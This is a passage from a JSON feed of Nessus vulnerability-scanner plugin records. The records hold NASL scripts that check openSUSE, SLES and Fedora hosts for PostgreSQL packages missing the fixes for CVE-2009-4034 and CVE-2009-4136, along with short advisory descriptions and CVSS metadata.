\"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"postgresql-devel-8.1.19-0.4.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"postgresql-libs-8.1.19-0.4.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, cpu:\"x86_64\", reference:\"postgresql-libs-32bit-8.1.19-0.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"postgresql-8.1.19-0.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"postgresql-contrib-8.1.19-0.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"postgresql-devel-8.1.19-0.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"postgresql-docs-8.1.19-0.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"postgresql-libs-8.1.19-0.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"postgresql-pl-8.1.19-0.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"postgresql-server-8.1.19-0.4.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, cpu:\"x86_64\", reference:\"postgresql-libs-32bit-8.1.19-0.4.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:42:03", "references": ["https://bugzilla.novell.com/show_bug.cgi?id=564360", "https://bugzilla.novell.com/show_bug.cgi?id=564710"], "pluginID": "44051", "description": "An unprivileged, authenticated PostgreSQL user could create a table which references functions with malicious content. Maintenance operations carried out be the database superuser could execute such functions (CVE-2009-4136).\n\nEmbedded null bytes in the common name of SSL certificates could bypass certificate hostname checks (CVE-2009-4034).\n\npostgresql was updated to the next upstream patchlevel update which also includes several bugfixes. See the package changelog for details.", "edition": 4, "reporter": "Tenable", "published": "2010-01-19T00:00:00", "title": "openSUSE Security Update : postgresql (postgresql-1773)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-4034", "CVE-2009-4136"], "modified": "2014-06-13T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:postgresql-libs-32bit", "cpe:/o:novell:opensuse:11.0", "p-cpe:/a:novell:opensuse:postgresql-devel", "p-cpe:/a:novell:opensuse:postgresql-libs", "p-cpe:/a:novell:opensuse:postgresql-pltcl", "p-cpe:/a:novell:opensuse:postgresql-plpython", "p-cpe:/a:novell:opensuse:postgresql", "p-cpe:/a:novell:opensuse:postgresql-server", "p-cpe:/a:novell:opensuse:postgresql-plperl", "p-cpe:/a:novell:opensuse:postgresql-contrib"], "id": "SUSE_11_0_POSTGRESQL-100108.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=44051", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update postgresql-1773.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(44051);\n script_version(\"$Revision: 1.6 $\");\n script_cvs_date(\"$Date: 2014/06/13 19:44:03 $\");\n\n script_cve_id(\"CVE-2009-4034\", \"CVE-2009-4136\");\n\n script_name(english:\"openSUSE Security Update : postgresql (postgresql-1773)\");\n script_summary(english:\"Check for the postgresql-1773 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An unprivileged, authenticated PostgreSQL user could create a table\nwhich references functions with malicious content. Maintenance\noperations carried out be the database superuser could execute such\nfunctions (CVE-2009-4136).\n\nEmbedded null bytes in the common name of SSL certificates could\nbypass certificate hostname checks (CVE-2009-4034).\n\npostgresql was updated to the next upstream patchlevel update which\nalso includes several bugfixes. See the package changelog for details.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=564360\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=564710\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected postgresql packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_cwe_id(310);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:postgresql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:postgresql-contrib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:postgresql-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:postgresql-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:postgresql-libs-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:postgresql-plperl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:postgresql-plpython\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:postgresql-pltcl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:postgresql-server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/01/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/01/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2014 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.0\", reference:\"postgresql-8.3.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"postgresql-contrib-8.3.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"postgresql-devel-8.3.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"postgresql-libs-8.3.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"postgresql-plperl-8.3.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"postgresql-plpython-8.3.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"postgresql-pltcl-8.3.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", reference:\"postgresql-server-8.3.9-0.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.0\", cpu:\"x86_64\", reference:\"postgresql-libs-32bit-8.3.9-0.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"postgresql / postgresql-contrib / postgresql-devel / etc\");\n}\n", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:42:31", "references": ["https://bugzilla.redhat.com/show_bug.cgi?id=546321", "https://bugzilla.redhat.com/show_bug.cgi?id=547662", "http://www.nessus.org/u?d623176f"], "pluginID": "43337", "description": "Update to latest upstream point releases\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 4, "reporter": "Tenable", "published": "2009-12-18T00:00:00", "title": "Fedora 11 : postgresql-8.3.9-1.fc11 (2009-13363)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 2.1}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-4034", "CVE-2009-4136"], "modified": "2015-10-21T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:postgresql", "cpe:/o:fedoraproject:fedora:11"], "id": "FEDORA_2009-13363.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=43337", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2009-13363.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(43337);\n script_version(\"$Revision: 1.11 $\");\n script_cvs_date(\"$Date: 2015/10/21 22:41:46 $\");\n\n script_cve_id(\"CVE-2009-4034\", \"CVE-2009-4136\");\n script_bugtraq_id(37142, 37333, 37334);\n script_xref(name:\"FEDORA\", value:\"2009-13363\");\n\n script_name(english:\"Fedora 11 : postgresql-8.3.9-1.fc11 (2009-13363)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to latest upstream point releases\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=546321\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=547662\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2009-December/032844.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d623176f\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected postgresql package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(310);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:postgresql\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/12/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/12/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2015 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^11([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 11.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC11\", reference:\"postgresql-8.3.9-1.fc11\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"postgresql\");\n}\n", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:39:08", "references": ["https://bugzilla.novell.com/show_bug.cgi?id=564360", "https://bugzilla.novell.com/show_bug.cgi?id=564710"], "pluginID": "44052", "description": "An unprivileged, authenticated PostgreSQL user could create a table which references functions with malicious content. Maintenance operations carried out be the database superuser could execute such functions (CVE-2009-4136).\n\nEmbedded null bytes in the common name of SSL certificates could bypass certificate hostname checks (CVE-2009-4034).\n\npostgresql was updated to the next upstream patchlevel update which also includes several bugfixes. See the package changelog for details.", "edition": 4, "reporter": "Tenable", "published": "2010-01-19T00:00:00", "title": "openSUSE Security Update : postgresql (postgresql-1773)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-4034", "CVE-2009-4136"], "modified": "2014-06-13T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:postgresql-libs-32bit", "p-cpe:/a:novell:opensuse:postgresql-devel", "p-cpe:/a:novell:opensuse:postgresql-libs", "p-cpe:/a:novell:opensuse:postgresql-pltcl", "cpe:/o:novell:opensuse:11.1", "p-cpe:/a:novell:opensuse:postgresql-plpython", "p-cpe:/a:novell:opensuse:postgresql", "p-cpe:/a:novell:opensuse:postgresql-server", "p-cpe:/a:novell:opensuse:postgresql-plperl", "p-cpe:/a:novell:opensuse:postgresql-contrib"], "id": "SUSE_11_1_POSTGRESQL-100108.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=44052", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update postgresql-1773.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(44052);\n script_version(\"$Revision: 1.6 $\");\n script_cvs_date(\"$Date: 2014/06/13 19:55:05 $\");\n\n script_cve_id(\"CVE-2009-4034\", \"CVE-2009-4136\");\n\n script_name(english:\"openSUSE Security Update : postgresql (postgresql-1773)\");\n script_summary(english:\"Check for the postgresql-1773 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An unprivileged, authenticated PostgreSQL user could create a table\nwhich references functions with malicious content. Maintenance\noperations carried out be the database superuser could execute such\nfunctions (CVE-2009-4136).\n\nEmbedded null bytes in the common name of SSL certificates could\nbypass certificate hostname checks (CVE-2009-4034).\n\npostgresql was updated to the next upstream patchlevel update which\nalso includes several bugfixes. See the package changelog for details.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=564360\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=564710\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected postgresql packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_cwe_id(310);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:postgresql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:postgresql-contrib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:postgresql-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:postgresql-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:postgresql-libs-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:postgresql-plperl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:postgresql-plpython\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:postgresql-pltcl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:postgresql-server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/01/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/01/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2014 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.1\", reference:\"postgresql-8.3.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"postgresql-contrib-8.3.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"postgresql-devel-8.3.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"postgresql-libs-8.3.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"postgresql-plperl-8.3.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"postgresql-plpython-8.3.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"postgresql-pltcl-8.3.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", reference:\"postgresql-server-8.3.9-0.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.1\", cpu:\"x86_64\", reference:\"postgresql-libs-32bit-8.3.9-0.1.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"postgresql / postgresql-contrib / postgresql-devel / etc\");\n}\n", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-01T23:37:23", "references": ["https://bugzilla.novell.com/show_bug.cgi?id=564360", "https://bugzilla.novell.com/show_bug.cgi?id=564710"], "pluginID": "44054", "description": "An unprivileged, authenticated PostgreSQL user could create a table which references functions with malicious content. Maintenance operations carried out be the database superuser could execute such functions (CVE-2009-4136).\n\nEmbedded null bytes in the common name of SSL certificates could bypass certificate hostname checks (CVE-2009-4034).\n\npostgresql was updated to the next upstream patchlevel update which also includes several bugfixes. See the package changelog for details.", "edition": 4, "reporter": "Tenable", "published": "2010-01-19T00:00:00", "title": "openSUSE Security Update : postgresql (postgresql-1773)", "type": "nessus", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "SuSE Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-4034", "CVE-2009-4136"], "modified": "2014-06-13T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:postgresql-libs-32bit", "p-cpe:/a:novell:opensuse:postgresql-devel", "p-cpe:/a:novell:opensuse:postgresql-libs", "p-cpe:/a:novell:opensuse:postgresql-pltcl", "p-cpe:/a:novell:opensuse:postgresql-plpython", "cpe:/o:novell:opensuse:11.2", "p-cpe:/a:novell:opensuse:postgresql", "p-cpe:/a:novell:opensuse:postgresql-server", "p-cpe:/a:novell:opensuse:postgresql-plperl", "p-cpe:/a:novell:opensuse:postgresql-contrib"], "id": "SUSE_11_2_POSTGRESQL-100111.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=44054", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update postgresql-1773.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(44054);\n script_version(\"$Revision: 1.6 $\");\n script_cvs_date(\"$Date: 2014/06/13 20:00:37 $\");\n\n script_cve_id(\"CVE-2009-4034\", \"CVE-2009-4136\");\n\n script_name(english:\"openSUSE Security Update : postgresql (postgresql-1773)\");\n script_summary(english:\"Check for the postgresql-1773 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"An unprivileged, authenticated PostgreSQL user could create a table\nwhich references functions with malicious content. Maintenance\noperations carried out be the database superuser could execute such\nfunctions (CVE-2009-4136).\n\nEmbedded null bytes in the common name of SSL certificates could\nbypass certificate hostname checks (CVE-2009-4034).\n\npostgresql was updated to the next upstream patchlevel update which\nalso includes several bugfixes. See the package changelog for details.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=564360\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=564710\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected postgresql packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_cwe_id(310);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:postgresql\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:postgresql-contrib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:postgresql-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:postgresql-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:postgresql-libs-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:postgresql-plperl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:postgresql-plpython\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:postgresql-pltcl\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:postgresql-server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:11.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/01/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/01/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2014 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE11\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"11.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE11.2\", reference:\"postgresql-8.4.2-1.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"postgresql-contrib-8.4.2-1.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"postgresql-devel-8.4.2-1.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"postgresql-libs-8.4.2-1.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"postgresql-plperl-8.4.2-1.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"postgresql-plpython-8.4.2-1.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"postgresql-pltcl-8.4.2-1.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", reference:\"postgresql-server-8.4.2-1.1.1\") ) flag++;\nif ( rpm_check(release:\"SUSE11.2\", cpu:\"x86_64\", reference:\"postgresql-libs-32bit-8.4.2-1.1.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"postgresql / postgresql-contrib / postgresql-devel / etc\");\n}\n", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-09-02T00:04:13", "references": ["http://www.postgresql.org/docs/7.4/static/release-7-4-27.html", "http://www.postgresql.org/about/news/1170/", "http://www.postgresql.org/docs/8.2/static/release-8-2-15.html", "http://www.postgresql.org/docs/8.1/static/release-8-1-19.html", "http://www.postgresql.org/docs/8.4/static/release-8-4-2.html", "http://www.postgresql.org/docs/8.0/static/release-8-0-23.html", "http://www.postgresql.org/docs/8.3/static/release-8-3-9.html"], "pluginID": "63348", "description": "The version of PostgreSQL installed on the remote host is 7.4 prior to 7.4.27, 8.0 prior to 8.0.23, 8.1 prior to 8.1.19, 8.2 prior to 8.2.15, 8.3 prior to 8.3.9 or 8.4 prior to 8.4.2. As such, it is potentially affected by multiple vulnerabilities :\n\n - NULL bytes in SSL Certificates can be used to falsify client or server authentication. (CVE-2009-4034)\n\n - Privilege escalation is possible via changing session state in an index function. (CVE-2009-4136)", "edition": 6, "reporter": "Tenable", "published": "2012-12-28T00:00:00", "title": "PostgreSQL 7.4 < 7.4.27 / 8.0 < 8.0.23 / 8.1 < 8.1.19 / 8.2 < 8.2.15 / 8.3 < 8.3.9 / 8.4 < 8.4.2 Multiple Vulnerabilities", "type": "nessus", "enchantments": {"score": 